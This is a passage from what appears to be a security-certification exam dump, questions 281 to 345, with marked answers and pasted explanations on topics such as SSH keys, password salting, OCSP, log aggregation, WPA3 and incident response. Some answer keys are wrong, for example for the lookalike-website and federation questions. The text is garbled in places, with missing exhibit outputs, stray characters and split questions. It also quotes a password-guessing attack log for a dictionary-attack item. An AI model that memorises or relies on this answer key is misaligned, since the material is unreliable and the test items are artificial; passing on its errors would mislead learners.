D. Deploy multifactor authentication for access to the wireless network 
E. Scan the wireless network for rogue access points.
F. Deploy a honeypot on the network

Answer: DF

END
QUESTION 281
A security analyst is hardening a Linux workstation and must ensure it has public keys forwarded to remote systems for secure login. Which of the following steps should the analyst perform to meet these requirements? (Select TWO).

A. Forward the keys using ssh-copy-id. 
B. Forward the keys using scp.
C. Forward the keys using ssh -i.
D. Forward the keys using openssl -s. 
E. Forward the keys using ssh-keygen.

Answer: AB

Ssh-copy-id for copying SSH keys to servers & scp - Secure File Copy (ssh.com)

ssh-copy-id installs an SSH key on a server as an authorized key. Its purpose is to provision access without requiring a password for each login. This facilitates automated, passwordless logins and single sign-on using the SSH protocol.

scp is a program for copying files between computers. It uses the SSH protocol. It is included by default in most Linux and Unix distributions. 

ssh command usage, options, and configuration in Linux/Unix.

END
QUESTION 282
A company recently experienced an attack in which a malicious actor was able to exfiltrate data by cracking stolen passwords using a rainbow table to obtain the sensitive data. Which of the following should a security engineer do to prevent such an attack in the future?

A. Use password hashing.
B. Enforce password complexity. 
C. Implement password salting. 
D. Disable password reuse.

Answer: C

END
QUESTION 283
The website http://companywebsite.com requires users to provide personal Information, Including security END
QUESTION responses for registration. Which of the following would MOST likely cause a data breach?

A. Lack of input validation 
B. Open permissions
C. Unsecure protocol 
D. Missing patches

Answer: C

END
QUESTION 284
The process of passively gathering information prior to launching a cyberattack is called:

A. tailgating
B. reconnaissance 
C. pharming
D. prepending

Answer: B

Pretexting and prepending are similar, and some people use the terms interchangeably. However, there is a subtle difference. They both start with pre indicating that something is being added to the beginning of something else. Contrast prepend with append, which adds something to the end. A pretext is a fictitious scenario added to a conversation to make a request more believable. For example, a social engineer may state he works with a known vendor and claims that there's a problem with some of the applications. He follows this with a request for information on the products used by the company. This prepended scenario may trick an employee into giving up information. In contrast, if someone called and just started asking for details about products used by a company, employees are much more likely to be suspicious.

END
QUESTION 285
An attacker is attempting to exploit users by creating a fake website with the URL www.validwebsite.com. 
The attacker's intent is to imitate the look and feel of a legitimate website to obtain personal information from unsuspecting users. Which of the following social-engineering attacks does this describe?

A. Information elicitation 
B. Typo squatting
C. Impersonation
D. Watering-hole attack

Answer: A

The concept of watering hole attacks is similar to spear phishing. Malicious attackers have figured out that opportunistic phishing emails are easily discarded, and that the more targeted and tailored attacks are to an individual, the more the attacks are likely to succeed. What differentiates spear phishing from watering hole attacks is that spear phishing attempts to persuade unsuspecting victims to click on an attachment or perform other actions with which they would divulge their private information.
Watering hole attacks, on the other hand, don't need to lure victims in that way. These attacks are already positioned in a particular space, infecting a third party-service or a website that the victim frequents, using malware with the end goal of infecting the user's device and gaining access to an organization's network.

END
QUESTION 286
An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker MOST likely attempting?

A. A spear-phishing attack 
B. A watering-hole attack 
C. Typo squatting
D. A phishing attack

Answer: B

END
QUESTION 287
Which of the following types of controls is a CCTV camera that is not being monitored?

A. Detective 
B. Deterrent 
C. Physical 
D. Preventive

Answer: B

END
QUESTION 288
A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

A. # iptables -t mangle -X 
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP

Answer: B

Basic and most common iptables rules (hostens.com)
Most Frequently Used Linux IPTables Rules with Examples (tutorialspoint.com)

INPUT – All packets destined for the host computer.
OUTPUT – All packets originating from the host computer.
FORWARD – All packets neither destined for nor originating from the host computer, but passing through (routed by) the host computer. This chain is used if you are using your computer as a router.

The first command we present is used to flush the existing iptables rules, this can be useful if we want to start with new rules or if we have accidentally blocked ourselves – “Flush iptables“):
iptables -F

END
QUESTION 289
A security analyst is configuring a large number of new company-issued laptops. 
The analyst received the following requirements:

- The devices will be used internationally by staff who travel extensively.
- Occasional personal use is acceptable due to the travel requirements. 
- Users must be able to install and configure sanctioned programs and productivity suites.
- The devices must be encrypted
- The devices must be capable of operating in low-bandwidth environments.

Which of the following would provide the GREATEST benefit to the security posture of the devices?

A. Configuring an always-on VPN
B. Implementing application whitelisting
C. Requiring web traffic to pass through the on-premises content filter 
D. Setting the antivirus DAT update schedule to weekly

Answer: B

END
QUESTION 290
A privileged user at a company stole several proprietary documents from a server. 
The user also went into the log files and deleted all records of the incident. 
The systems administrator has just informed investigators that other log files are available for review.
Which of the following did the administrator MOST likely configure that will assist the investigators?

A. Memory dumps 
B. The syslog server
C. The application logs
D. The log retention policy

Answer: B

END
QUESTION 291
A security engineer at an offline government facility is concerned about the validity of an SSL certificate. The engineer wants to perform the fastest check with the least delay to determine if the certificate has been revoked.
Which of the following would BEST meet this requirement?

A. RA
B. OCSP 
C. CRL 
D. CSR

Answer: B

What is a Certificate Revocation List (CRL) vs OCSP | Keyfactor

OCSP & OCSP Stapling - Another method used to convey information to users about revoked certificates is the Online Certificate Status Protocol (OCSP). Instead of downloading the latest CRL and parsing it to check whether a requested certificate on the list, the browser requests the status for a particular certificate from the issuing CA's revocation server.
Using the certificate's serial number, the OCSP service checks for certificate status, then the CA replies with a digitally signed response containing the certificate status. An OCSP response contains one of three values: “good”, “revoked”, or “unknown”. OCSP responses are smaller than CRL files and are suitable for devices with limited memory.

Here is an illustrated workflow of the certificate revocation check process using OCSP
OCSP stapling is an enhancement to the standard OCSP protocol and is defined in RFC 6066. Enabling OCSP stapling eliminates the need for a browser to send OCSP requests directly to the CA. Instead, the web server caches the OSCP response from the CA and when a TLS handshake is initiated by the client, the web server “staples” the OSCP response to the certificate it sends to the browser.

END
QUESTION 292
A security analyst needs to perform periodic vulnerability scans on production systems. 
Which of the following scan types would produce the BEST vulnerability scan report?

9A. Port
B. Intrusive
C. Host discovery 
D. Credentialed

Answer: D

END
QUESTION 293
A company was recently breached. Part of the company's new cybersecurity strategy is to centralize the logs from all security devices. Which of the following components forwards the logs to a central source?

A. Log enrichment
B. Log aggregation 
C. Log parser
D. Log collector

Answer: B

What is Log Aggregation? | Sumo Logic

Log aggregation is a software function that consolidates log data from throughout the IT infrastructure into a single centralized platform where it can be reviewed and analyzed. Log aggregation software tools may support additional functionality, such as data normalization, log search, and complex data analysis. Log aggregation is just one aspect of an overall log management process that produces real-time insights into application security and performance.

END
QUESTION 294
Given the following logs:

[DATA] attacking service ftp on port 21
[ATTEMPT] target 192.168.50.1 - login "admin" - pass "password"
[ATTEMPT] target 192.168.50.1 - login "admin" - pass "access"
[ATTEMPT] target 192.168.50.1 - login "admin" - pass "alloq"
[ATTEMPT] target 192.168.50.1 - login "admin" - pass "please"
[ATTEMPT] target 192.168.50.1 - login "admin" - pass "ftp"
[ATTEMPT] target 192.168.50.1 - login "admin" - pass "letmein"
[21] [ftp] host: 192.168.50.1 login:admin password:letmein
1 of 1 target successfully completed, 1 valid password found

Which of the following BEST describes the type of attack that is occurring?

A. Rainbow table 
B. Dictionary
C. Password spraying 
D. Pass-the-hash

Answer: B

END
QUESTION 295
Which of the following will MOST likely cause machine learning and Al-enabled systems to operate with unintended consequences?

A. Stored procedures 
B. Buffer overflows 
C. Data bias
D. Code reuse

Answer: C 

htps://lionbridge.ai/artcles/7-types-of-data-bias-in-machine-learning/

Data bias in machine learning is a type of error in which certain elements of a dataset are more heavily weighted and/or represented than others. A biased dataset does not accurately represent a model's use case, resulting in skewed outcomes, low accuracy levels, and analytical errors.

END
QUESTION 296
An organization blocks user access to command-line interpreters but hackers still managed to invoke the interpreters using native administrative tools.
Which of the following should the security team do to prevent this from Happening in the future?

A. Implement HIPS to block Inbound and outbound SMB ports 139 and 445. 
B. Trigger a SIEM alert whenever the native OS tools are executed by the user
C. Disable the built-in OS utilities as long as they are not needed for functionality. 
D. Configure the AV to quarantine the native OS tools whenever they are executed

Answer: C

END
QUESTION 297
An analyst has determined that a server was not patched and an external actor exfiltrated data on port 139.
Which of the following sources should the analyst review to BEST ascertain how the Incident could have been prevented?

A. The vulnerability scan output 
B. The security logs
C. The baseline report
D. The correlation of events

Answer: D

Event correlation is a technique for making sense of a large number of events and pinpointing the few events that are really important in that mass of information. This is accomplished by looking for and analyzing relationships between events.

END
QUESTION 298
A local coffee shop runs a small WiFi hotspot for its customers that utilizes WPA2-PSK. The coffee shop would like to stay current with security trends and wants to implement WPA3 to make its WiFi even more secure. Which of the following technologies will the coffee shop MOST likely use in place of PSK?

A. WEP
B. MSCHAP
C. WPS 
D. SAE

Answer: D

In January 2018, the Wi-Fi Alliance announced WPA3 as a replacement to WPA2.[3][4] The new standard uses 128-bit encryption in WPA3-Personal mode (192-bit in WPA3-Enterprise)[5] and forward secrecy.[6] The WPA3 standard also replaces the pre-shared key (PSK) exchange with Simultaneous Authentication of Equals as defined in IEEE 802.11-2016 resulting in a more secure initial key exchange in personal mode.[7][8] The Wi-Fi Alliance also claims that WPA3 will mitigate security issues posed by weak passwords and simplify the process of setting up devices with no display interface.https://en.wikipedia.org/wiki/Simultaneous_Authentication_of_Equals - cite_note-wpa3-announce-9

END
QUESTION 299
The concept of connecting a user account across the systems of multiple enterprises is BEST known as:

A. federation.
B. a remote access policy. 
C. multifactor authentication. 
D. single sign-on.

Answer: D

END
QUESTION 300
A Chief Executive Officer (CEO) is dissatisfied with the level of service from the company's new service provider. The service provider is preventing the CEO from sending email from a work account to a personal account. Which of the following types of service providers is being used?

A. Telecommunications service provider 
B. Cloud service provider
C. Master managed service provider 
D. Managed security service provider

Answer: D

The following list shows some of the services an MSSP may provide: 
1. Patch management 
2. Vulnerability scanning 
3. Spam and virus filtering 
4. Data loss prevention (DLP) 
5. Virtual private network connections 
6. Proxy services for web content filtering 
7. Intrusion detection and prevention systems 
8. Unified threat management (UTM) appliances 
9. Advanced firewalls such as next-generation firewalls (NGFWs)

END
QUESTION 301
A security analyst is running a vulnerability scan to check for missing patches during a suspected security incident.
During which of the following phases of the response process is this activity MOST likely occurring?

A. Containment 
B. Identification 
C. Recovery
D. Preparation

Answer: B

END
QUESTION 302
Which of the following is MOST likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have been implemented?

A. An RTO report 
B. A risk register
C. A business impact analysis 
D. An asset value register
E. A disaster recovery plan

Answer: B

A risk register is a document used as a risk management tool and to fulfill regulatory compliance acting as a repository for all risks identified and includes additional information about each risk, e.g. nature of the risk, reference and owner, mitigation measures.

END
QUESTION 303
A client sent several inquiries to a project manager about the delinquent delivery status of some critical reports. 
The project manager stated the reports were previously sent via email but then quickly generated and backdated the reports before submitting them via a new email message. 
Which of the following actions MOST likely supports an investigation for fraudulent submission?

A. Establish chain of custody 
B. Inspect the file metadata
C. Reference the data retention policy 
D. Review the email event logs

Answer: D

END
QUESTION 304
A university is opening a facility in a location where there is an elevated risk of theft.
The university wants to protect the desktops in its classrooms and labs.
Which of the following should the university use to BEST protect these assets deployed in the facility?

A. Visitor logs 
B. Cable locks 
C. Guards
D. Disk encryption 
E. Motion detection

Answer: B

END
QUESTION 305
A systems analyst is responsible for generating a new digital forensics chain-of-custody form. 
Which of the following should the analyst include in this documentation? (Select TWO).

A. The order of volatility 
B. A checksum
C. The location of the artifacts 
D. The vendor's name
E. The date and time 
F. A warning banner

Answer: CE

A chain of custody is an important legal document that testifies to a sample's validity. Properly filled out chain of custodies should include: sample ID, location of source, date and time collected, date and time received at the lab, sample preservation, analysis required, name of collector, pertinent field data, names of those who had custody of the sample, and reporting/billing contacts.

Cyclic Redundancy Check (CRC) - CRCs are similar in concept to checksums, but they use polynomial division to determine the value of the CRC, which is usually 16 or 32 bits in length. The good thing about CRC is that it is very accurate. If a single bit is incorrect, the CRC value will not match up. Both checksum and CRC are good for preventing random errors in transmission but provide little ...
Definition of provenance
1: ORIGIN, SOURCE
2: the history of ownership of a valued object or work of art or literature


END
QUESTION 306
A company is setting up a web server on the Internet that will utilize both encrypted and unencrypted web-browsing protocols. A security engineer runs a port scan against the server from the Internet and sees the following output:










Which of the following steps would be best for the security engineer to take NEXT?

A. Allow DNS access from the internet. 
B. Block SMTP access from the Internet 
C. Block HTTPS access from the Internet 
D. Block SSH access from the Internet.

Answer: D

END
QUESTION 307
Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

A. To provide data to quantify risk based on the organization's systems.
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network 
D. To standardize by selecting one laptop model for all users in the organization

Answer: C

END
QUESTION 308
An attacker was easily able to log in to a company's security camera by performing an online search for a setup guide for that particular camera brand and model. Which of the following BEST describes the configurations the attacker exploited?

A. Weak encryption 
B. Unsecure protocols 
C. Default settings
D. Open permissions

Answer: C

END
QUESTION 309
A cloud administrator is configuring five compute instances under the same subnet in a VPC. Three instances are required to communicate with one another, and the other two must be logically isolated from all other instances in the VPC. Which of the following must the administrator configure to meet this requirement?

A. One security group 
B. Two security groups
C. Three security groups 
D. Five security groups

Answer: B

END
QUESTION 310
An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan the analyst identifies that a server has some insecure services enabled on default ports.
Which of the following BEST describes the services that are currently running and the secure alternatives for replacing them' (Select THREE)

A. SFTP, FTPS
B. SNMPv2, SNMPv3 
C. HTTP, HTTPS
D. TFTP, FTP
E. SNMPv1, SNMPv2 
F. Telnet, SSH
G. TLS, SSL 
H. POP, IMAP 
I. Login, rlogin

Answer: BCF

Rlogin was created at a time when security wasn’t really a major problem, thus it does not use encryption and all the traffic 
is sent in plain text. As the security holes in Rlogin became more serious, SSH was made as a more secure alternative.

END
QUESTION 311
A security architect at a large, multinational organization is concerned about the complexities and overhead of managing multiple encryption keys securely in a multi-cloud provider environment. The security architect is looking for a solution with reduced latency to allow the incorporation of the organization's existing keys and to maintain consistent, centralized control and management regardless of the data location.
Which of the following would BEST meet the architect's objectives?

A. Trusted Platform Module 
B. laaS
C. HSMaaS 
D. PaaS
E. Key Management Service

Answer: C

HSM as a Service: secure and convenient
HSM as a Service (HSMaaS) is an alternative to HSM devices and KMS. HSMaaS provides secure, centralized key management and cryptography without the need for HSM appliances. Its on-demand implementation simplifies the provisioning and control of encryption keys. An added benefit of the HSMaaS approach is the ability to maintain encryption keys separate from the data they protect, thereby providing an additional level of data security.
HSM or KMS or HSM as a Service: What drives the decision?
In our discussions with businesses developing or evaluating an encryption key management for cloud strategy we’ve worked with every size organization at every level of the maturity curve—small businesses proactively working to improve data security, cloud-born startups, organizations with hybrid cloud architectures and global organizations wrestling with the complexity of complying with varying regulations such as GDPR and the California Consumer Privacy Act (CCPA). In advising these businesses on their encryption key management strategy we’ve discovered several common reasons for choosing HSM as a Service over HSMs or KMS.

END
QUESTION 312
A security operations analyst is using the company's SIEM solution to correlate alerts. 
Which of the following stages of the incident response process is this an example of?

A. Eradication 
B. Recovery
C. Identification 
D. Preparation

Answer: C

END
QUESTION 313
A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident occurred from one of the workstations. The root cause appears to be that the SoC (System on Chip) was tampered with or replaced. Which of the following MOST likely occurred?

A. Fileless malware
B. A downgrade attack 
C. A supply-chain attack 
D. A logic bomb
E. Misconfigured BIOS

Answer: C

A system on a chip (SoC) is an integrated circuit that includes all the functionality of a computing system within the hardware. It typically includes an application contained within onboard memory, such as read-only memory (ROM), electrically erasable programmable ROM (EEPROM), or flash memory. Many mobile computing devices include an SoC.

END
QUESTION 314
A hospital's administration is concerned about a potential loss of patient data that is stored on tablets. 
A security administrator needs to implement controls to alert the SOC any time the devices are near exits. 
Which of the following would BEST achieve this objective?

A. Geotargeting 
B. Geolocation 
C. Geotagging 
D. Geofencing

Answer: D

Geofencing refers to accepting or rejecting access requests based on location. Geofencing can also be used for push notification to send alerts or advice to a device when a user enters a specific area. Geotagging refers to the addition of location 
metadata to files or devices. This is often used for asset management to ensure devices are kept with the proper location.
Geotagging refers to the addition of location metadata to files or devices. 

END
QUESTION 315
A SOC is implementing an insider-threat-detection program. The primary concern is that users may be accessing confidential data without authorization. Which of the following should be deployed to detect a potential insider threat?

A. A honeyfile 
B. A DMZ
C. DLP
D. File integrity monitoring

Answer: A

END
QUESTION 316
A desktop support technician recently installed a new document-scanning software program on a computer.
However, when the end user tried to launch the program, it did not respond.
Which of the following is MOST likely the cause?

A. A new firewall rule is needed to access the application.
B. The system was quarantined for missing software updates 
C. The software was not added to the application whitelist.
D. The system was isolated from the network due to infected software.

Answer: C

END
QUESTION 317
A company has been experiencing very brief power outages from its utility company over the last few months. These outages only last for one second each time. The utility company is aware of the issue and is working to replace a faulty transformer. Which of the following BEST describes what the company should purchase to ensure its critical servers and network devices stay online?

A. Dual power supplies 
B. A UPS
C. A generator 
D. APDU

Answer: B

An application protocol data unit (APDU) is the communication unit between a smart card reader and a smart card. 
The structure of the APDU is defined by ISO/IEC 7816-4 Organization, security and commands for interchange.

END
QUESTION 318
After a phishing scam for a user's credentials, the red team was able to craft a payload to deploy on a server. 
The attack allowed the installation of malicious software that initiates a new remote session.
Which of the following types of attacks has occurred?

A. Privilege escalation 
B. Session replay
C. Application programming interface 
D. Directory traversal

Answer: A

END
QUESTION 319
A security analyst notices several attacks are being blocked by the NIPS but does not see anything on the boundary firewall logs. The attack seems to have been thwarted. Which of the following resiliency techniques was applied to the network to prevent this attack?

A. NIC Teaming 
B. Port mirroring
C. Defense in depth 
D. High availability
E. Geographic dispersal

Answer: C

END
QUESTION 320
A network administrator at a large organization is reviewing methods to improve the security of the wired LAN. 
Any security improvement must be centrally managed and allow corporate-owned devices to have access to the intranet but limit others to Internet access only. Which of the following should the administrator recommend?

A. 802.1X utilizing the current PKI infrastructure 
B. SSO to authenticate corporate users
C. MAC address filtering with ACLs on the router 
D. PAM for user account management

Answer: A

END
QUESTION 321
An organization is having difficulty correlating events from its individual AV. EDR. DLP. SWG. WAF. MDM, HIPS, and CASB systems. Which of the following is the BEST way to improve the situation?

A. Remove expensive systems that generate few alerts. 
B. Modify the systems to alert only on critical issues.
C. Utilize a SIEM to centralize logs and dashboards. 
D. Implement a new syslog/NetFlow appliance.

Answer: C

END
QUESTION 322
An attacker is attempting, to harvest user credentials on a client's website. A security analyst notices multiple attempts of random usernames and passwords. When the analyst types in a random username and password, the logon screen displays the following message:


Which of the following should the analyst recommend be enabled?

A. Input validation 
B. Obfuscation
C. Error handling
D. Username lockout

Answer: C

END
QUESTION 323
A security analyst needs to implement security features across smartphones, laptops, and tablets. 
Which of the following would be the MOST effective across heterogeneous platforms?

A. Enforcing encryption 
B. Deploying GPOs
C. Removing administrative permissions 
D. Applying MDM software

Answer: D

END
QUESTION 324
The cost of removable media and the security risks of transporting data have become too great for a laboratory. 
The laboratory has decided to interconnect with partner laboratories to make data transfers easier and more secure. The Chief Security Officer (CSO) has several concerns about proprietary data being exposed once the interconnections are established. Which of the following security features should the network administrator implement to prevent unwanted data exposure to users in partner laboratories?

A. VLAN zoning with a file-transfer server in an external-facing zone 
B. DLP running on hosts to prevent file transfers between networks
C. NAC that permits only data-transfer agents to move data between networks 
D. VPN with full tunneling and NAS authenticating through the Active Directory

Answer: B

END
QUESTION 325
An external forensics investigator has been hired to investigate a data breach at a large enterprise with numerous assets. It is known that the breach started in the DMZ and moved to the sensitive information, generating multiple logs as the attacker traversed through the network. Which of the following will BEST assist with this investigation?

A. Perform a vulnerability scan to identity the weak spots. 
B. Use a packet analyzer to Investigate the NetFlow traffic. 
C. Check the SIEM to review the correlated logs.
D. Require access to the routers to view current sessions.

Answer: C

END
QUESTION 326
The human resources department of a large online retailer has received multiple customer complaints about the rudeness of the automated chatbots it uses to interface and assist online shoppers. 
The system, which continuously learns and adapts, was working fine when it was installed a few months ago. Which of the following BEST describes the method being used to exploit the system?

A. Baseline modification 
B. A fileless virus
C. Tainted training data
D. Cryptographic manipulation

Answer: C

END
QUESTION 327
Joe. a security analyst, recently performed a network discovery to fully understand his organization's electronic footprint from a "public" perspective. Joe ran a set of commands and received the following output:










100

Which of the following can be determined about the organization's public presence and security posture? (Select TWO).

A. Joe used Who is to produce this output. 
B. Joe used cURL to produce this output.
C. Joe used Wireshark to produce this output
D. The organization has adequate information available in public registration. 
E. The organization has too much information available in public registration. 
F. The organization has too little information available in public registration

Answer: AE

How to Use WHOIS Command in Windows 10 - Tech Buzz Online

END
QUESTION 328
Joe, an employee, is transferring departments and is providing copies of his files to a network share folder for his previous team to access. Joe is granting read-write-execute permissions to his manager but giving read-only access to the rest of the team. Which of the following access controls is Joe using?

A. FACL 
B. DAC 
C. ABAC 
D. MAC

Answer: B

Discretionary access control (DAC) is based on the primacy of the resource owner. The owner is originally the creator 
of a file or service, though ownership can be assigned to another user. The owner is granted full control over the resource, meaning that he or she can modify its access control list (ACL) to grant rights to others.

The file permissions according to the file system access control list (FACL) are rw-rw-r–.
The first ‘rw-‘ are the file owner permissions (read and write).
The second ‘rw-‘ are the group permissions (read and write) for the group that has been assigned the file.
The third ‘r–‘ is the All Users permissions; in this case read only.

END
QUESTION 329
When implementing automation with loT devices, which of the following should be considered FIRST to keep the network secure?

A. Z-Wave compatibility 
B. Network range
C. Zigbee configuration
D. Communication protocols

Answer: D

END
QUESTION 330
An organization's corporate offices were destroyed due to a natural disaster, so the organization is now setting up offices in a temporary workspace. Which of the following will the organization MOST likely consult?

A. The business continuity plan 
B. The disaster recovery plan 
C. The communications plan 
D. The incident response plan

Answer: A

END
QUESTION 331
An organization recently recovered from a data breach. During the root cause analysis, the organization determined the source of the breach to be a personal cell phone that had been reported lost. Which of the following solutions should the organization implement to reduce the likelihood of future data breaches?

A. MDM 
B. MAM 
C. VDI 
D. DLP

Answer: A

Mobile device management (MDM)—sets device policies for authentication, feature use (camera and microphone), and connectivity. MDM can also allow device resets and remote wipes.
Mobile application management (MAM)—sets policies for apps that can process corporate data, and prevents data transfer to personal apps. This type of solution configures an enterprise-managed container or workspace.

END
QUESTION 332
An organization relies on third-party video conferencing to conduct daily business. 
Recent security changes now require all remote workers to utilize a VPN to corporate resources. 
Which of the following would BEST maintain high-quality video conferencing while minimizing latency when connected to the VPN?

A. Using geographic diversity to have VPN terminators closer to end users 
B. Utilizing split tunneling so only traffic for corporate resources is encrypted 
C. Purchasing higher-bandwidth connections to meet the increased demand 
D. Configuring QoS properly on the VPN accelerators

Answer: B

END
QUESTION 333
A company just developed a new web application for a government agency. 
The application must be assessed and authorized prior to being deployed. 
Which of the following is required to assess the vulnerabilities resident in the application?

A. Repository transaction logs
B. Common Vulnerabilities and Exposures 
C. Static code analysis
D. Non-credentialed scans

Answer: C

END
QUESTION 334
A user must introduce a password and a USB key to authenticate against a secure computer, and authentication is limited to the state in which the company resides. Which of the following authentication concepts are in use?

A. Something you know, something you have, and somewhere you are 
B. Something you know, something you can do, and somewhere you are
C. Something you are, something you know, and something you can exhibit 
D. Something you have, somewhere you are, and someone you know

Answer: A

END
QUESTION 335
A bank detects fraudulent activity on user's accounts. The user confirms transactions completed yesterday on the bank's website at https://www.company.com. A security analyst then examines the user's Internet usage logs and observes the following output:

date;	         username;	 url;	destinationport; 	responsecode 
2020-03-01; userann; http: //www.company.com/;80;302
2020-03-01; userann: http: //www.company.com/secure_login/;80;200 
2020-03-01; userann:http: //www.company.com/dashboard/;80;200

Which of the following has MOST likely occurred?

A. Replay attack 
B. SQL injection 
C. SSL stripping 
D. Race conditions

Answer: C

A Secure Sockets Layer (SSL) stripping attack changes a Hypertext Transfer Protocol Secure (HTTPS) connection to a Hypertext Transfer Protocol (HTTP) connection. HTTPS uses Transport Layer Security (TLS) instead of SSL in almost all instances, so you can also think of this as TLS stripping. HTTPS sessions are encrypted, so data sent within a session is unreadable. However, the session is not encrypted until TLS sets up the session. If an attacker can intercept the beginning 
of the TLS negotiation, the attacker can redirect the user to an HTTP page instead of an HTTPS page.

END
QUESTION 336
A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems. Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage. Which of the following is MOST likely the cause?

A. The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage.
B. The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.
C. The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.
D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Answer: D

Mimikatz is a credential dumping open source program used to obtain account login and password information, normally in the form of a hash or a clear text password, from an operating system or software. Credentials can then be used to perform lateral movement and access restricted information.
Mimikatz is a Windows x32/x64 program to extract passwords, hash, PINs, and Kerberos tickets from memory.  It is used as an attack tool against Windows clients, allowing the extraction of cleartext passwords and password hashes from memory.

END
QUESTION 337
A network administrator is concerned about users being exposed to malicious content when accessing company cloud applications. The administrator wants to be able to block access to sites based on the AUP. The users must also be protected because many of them work from home or at remote locations, providing on-site customer support. Which of the following should the administrator employ to meet these criteria?

A. Implement NAC.
B. Implement an SWG. 
C. Implement a URL filter. 
D. Implement an MDM.

Answer: B

END
QUESTION 338
An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The company recently established a new office in Europe. To which of the following frameworks should the security officer map the existing controls? (Select TWO).

A. ISO
B. PCI DSS 
C. SOC
9D. GDPR 
E. CSA 
F. NIST

Answer: BD
The not-for-profit organization Cloud Security Alliance (CSA) produces various resources to assist cloud service providers (CSP) in setting up and delivering secure cloud platforms.

END
QUESTION 339
Several large orders of merchandise were recently purchased on an e-commerce company's website. 
The totals for each of the transactions were negative values, resulting in credits on the customers' accounts. 
Which of the following should be implemented to prevent similar situations in the future?

A. Ensure input validation is in place to prevent the use of invalid characters and values.
B. Calculate all possible values to be added together and ensure the use of the proper integer in the code.
C. Configure the web application firewall to look for and block session replay attacks.
D. Make sure transactions that are submitted within very short time periods are prevented from being processed.

Answer: B

An integer overflow occurs if an application receives a numeric value that is too big for the application to handle. The result is that the application gives inaccurate results. As an example, if an application reserves 8 bits to store a number, it can store any value between 0 and 255. If the application attempts to multiply two values, such as 95 × 59, and store the result (5,605) in an 8-bit memory location, it causes an integer overflow. It’s a good practice to double-check the size of memory buffers to ensure they can handle any data generated by applications. It’s also possible to use input validation techniques to prevent integer overflow issues. If the application doesn’t have adequate error- and exception-handling routines, this might cause an integer overflow condition.

An integer is a positive or negative number with no fractional component (a whole number). Integers are widely used as a data type, where they are commonly defined with fixed lower and upper bounds. An integer overflow attack causes the target
software to calculate a value that exceeds these bounds. This may cause a positive number to become negative (changing a bank debit to a credit, for instance). It could also be used where the software is calculating a buffer size; if the attacker is able to make the buffer smaller than it should be, he or she may then be able to launch a buffer overflow attack.

END
QUESTION 340
To mitigate the impact of a single VM being compromised by another VM on the same hypervisor, 
an administrator would like to utilize a technical control to further segregate the traffic.
Which of the following solutions would BEST accomplish this objective?

A. Install a hypervisor firewall to filter east-west traffic. 
B. Add more VLANs to the hypervisor network switches. 
C. Move exposed or vulnerable VMs to the DMZ.
D. Implement a zero-trust policy and physically segregate the hypervisor servers.

Answer: B

END
QUESTION 341
A nationwide company is experiencing unauthorized logins at all hours of the day. 
The logins appear to originate from countries in which the company has no employees.
Which of the following controls should the company consider using as part of its IAM strategy? (Select TWO).

A. A complex password policy 
B. Geolocation
C. An impossible travel policy 
D. Self-service password reset 
E. Geofencing
F. Time-based logins

Answer: BC

Time-based logins (sometimes referred to as time-of-day restrictions) ensure that users can only log on to computers during specific times. If a user tries to log on to a system outside the restricted time, the system denies access to the user.

END
QUESTION 342
An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would BEST support the new office?

A. Always On
B. Remote access 
C. Site-to-site
D. Full tunnel

Answer: C

END
QUESTION 343 
A security analyst has been reading about a newly discovered cyberattack from a known threat actor. 
Which of the following would BEST support the analyst's review of the tactics, techniques, and protocols the threat actor was observed using in previous campaigns?

A. Security research publications 
B. The MITRE ATT&CK framework
C. The Diamond Model of Intrusion Analysis 
D. The Cyber Kill Chain

Answer: B

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a knowledge base of tactics and techniques used in real-world attacks. The knowledge base is presented in a matrix or table format. Tactics represent the adversary’s tactical objective for performing an action or why the adversary is doing what he’s doing. The techniques document how an adversary achieves a tactical objective or what the adversary gains by performing an action.

The Diamond Model of Intrusion Analysis focuses on understanding the attacker by analyzing four key components of every intrusion event. These four components are: 

Adversary. Adversaries can be identified by email addresses, handles used in online forums,  memberships in advanced persistent threat groups, and other identifiers. 

Capabilities. Capabilities refer to the malware, exploits, and other hacker tools used in the intrusion.

Infrastructure. The infrastructure refers to the Internet domain names, email addresses, and IP addresses used by the adversary.

Victim. Victims can be identified by their names, email addresses, or network identifiers.

Cyber Kill Chain - Scientists at Lockheed-Martin identified an intrusion kill chain with the following elements performed in order from start to finish: 

Reconnaissance. This includes researching, identifying, and selecting targets.

Weaponization. Malware, such as a remote access Trojan (RAT), is embedded within a deliverable payload, such as an infected Microsoft Office document.

Delivery. The payload is transmitted to the target. Malware is often delivered as an attachment within a phishing email.

Exploitation. After the weapon is delivered, it activates and triggers the exploit. Exploits often target an application or operating system vulnerability.

END
QUESTION 344
Which of the following is the correct order of volatility from MOST to LEAST volatile?

A. Memory, temporary filesystems, routing tables, disk, network storage 
B. Cache, memory, temporary file systems, disk, archival media
C. Memory, disk, temporary filesystems, cache, archival media
D. Cache, disk, temporary filesystems, network storage, archival media

Answer: B

END
QUESTION 345
After installing a Windows server, a cybersecurity administrator needs to harden it, following security best practices. Which of the following will achieve the administrator's goal? (Select TWO).

A. Disabling guest accounts 
B. Disabling service accounts 
C. Enabling network sharing
D. Disabling NetBIOS over TCP/IP 
